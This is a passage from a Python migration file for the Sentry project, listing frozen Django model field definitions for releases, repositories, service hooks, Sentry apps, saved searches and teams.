'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.projectownership': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectOwnership', 'index_together': '()'},
'auto_assignment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'fallthrough': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'raw': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'})
},
'sentry.projectplatform': {
'Meta': {'unique_together': "(('project_id', 'platform'),)", 'object_name': 'ProjectPlatform', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.projectredirect': {
'Meta': {'unique_together': "(('organization', 'redirect_slug'),)", 'object_name': 'ProjectRedirect', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'redirect_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'sentry.projectsymcachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectSymCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectteam': {
'Meta': {'unique_together': "(('project', 'team'),)", 'object_name': 'ProjectTeam', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.promptsactivity': {
'Meta': {'unique_together': "(('user', 'feature', 'organization_id', 'project_id'),)", 'object_name': 'PromptsActivity', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.pullrequest': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'PullRequest', 'db_table': "'sentry_pull_request'", 'index_together': "(('repository_id', 'date_added'), ('organization_id', 'merge_commit_sha'))"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'merge_commit_sha': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.pullrequestcommit': {
'Meta': {'unique_together': "(('pull_request', 'commit'),)", 'object_name': 'PullRequestCommit', 'db_table': "'sentry_pullrequest_commit'", 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'pull_request': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.PullRequest']"})
},
'sentry.rawevent': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'RawEvent', 'index_together': '()'},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.recentsearch': {
'Meta': {'unique_together': "(('user', 'organization', 'type', 'query_hash'),)", 'object_name': 'RecentSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'query_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.relay': {
'Meta': {'unique_together': '()', 'object_name': 'Relay', 'index_together': '()'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'relay_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'sentry.release': {
'Meta': {'unique_together': "(('organization', 'version'),)", 'object_name': 'Release', 'index_together': '()'},
'authors': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'commit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'releases'", 'symmetrical': 'False', 'through': "orm['sentry.ReleaseProject']", 'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'total_deploys': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'sentry.releasecommit': {
'Meta': {'unique_together': "(('release', 'commit'), ('release', 'order'))", 'object_name': 'ReleaseCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseenvironment': {
'Meta': {'unique_together': "(('organization', 'release', 'environment'),)", 'object_name': 'ReleaseEnvironment', 'db_table': "'sentry_environmentrelease'", 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile', 'index_together': "(('release', 'name'),)"},
'dist': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Distribution']", 'null': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseheadcommit': {
'Meta': {'unique_together': "(('repository_id', 'release'),)", 'object_name': 'ReleaseHeadCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.releaseproject': {
'Meta': {'unique_together': "(('project', 'release'),)", 'object_name': 'ReleaseProject', 'db_table': "'sentry_release_project'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseprojectenvironment': {
'Meta': {'unique_together': "(('project', 'release', 'environment'),)", 'object_name': 'ReleaseProjectEnvironment', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'new_issues_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.repository': {
'Meta': {'unique_together': "(('organization_id', 'name'), ('organization_id', 'provider', 'external_id'))", 'object_name': 'Repository', 'index_together': '()'},
'config': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.reprocessingreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'ReprocessingReport', 'index_together': '()'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.rule': {
'Meta': {'unique_together': '()', 'object_name': 'Rule', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'), ('organization', 'owner', 'type'))", 'object_name': 'SavedSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_global': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'query': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.savedsearchuserdefault': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'SavedSearchUserDefault', 'db_table': "'sentry_savedsearch_userdefault'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'savedsearch': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.SavedSearch']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.scheduleddeletion': {
'Meta': {'unique_together': "(('app_label', 'model_name', 'object_id'),)", 'object_name': 'ScheduledDeletion', 'index_together': '()'},
'aborted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)'}),
'guid': ('django.db.models.fields.CharField', [], {'default': "'a426ce10c7824ca2a31b88c01cf51105'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'object_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.scheduledjob': {
'Meta': {'unique_together': '()', 'object_name': 'ScheduledJob', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'payload': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.sentryapp': {
'Meta': {'unique_together': '()', 'object_name': 'SentryApp', 'index_together': '()'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiApplication']"}),
'author': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_alertable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.TextField', [], {}),
'overview': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'owned_sentry_apps'", 'to': "orm['sentry.Organization']"}),
'proxy_user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.User']"}),
'redirect_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'95221a10-3d96-4af7-8670-be0f643dd7a1'", 'max_length': '64'}),
'webhook_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.sentryappavatar': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.SentryApp']"})
},
'sentry.sentryappcomponent': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppComponent', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'components'", 'to': "orm['sentry.SentryApp']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'})
},
'sentry.sentryappinstallation': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppInstallation', 'index_together': '()'},
'api_grant': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiGrant']"}),
'api_token': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiToken']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_app_installations'", 'to': "orm['sentry.Organization']"}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'installations'", 'to': "orm['sentry.SentryApp']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'c025a308-74d1-4b11-95f4-f74b0dba0a37'", 'max_length': '64'})
},
'sentry.servicehook': {
'Meta': {'unique_together': '()', 'object_name': 'ServiceHook', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'351f827fb83b47d2b3d4c8a8a379cc632e91af06c5d44946abd9396a33877cc8'"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '512'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.servicehookproject': {
'Meta': {'unique_together': "(('service_hook', 'project_id'),)", 'object_name': 'ServiceHookProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'service_hook': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ServiceHook']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project_id', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project_id', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'", 'index_together': "(('project_id', 'key', 'last_seen'),)"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teamavatar': {
'Meta': {'unique_together': '()', 'object_name': 'TeamAvatar', 'index_together': '()'},
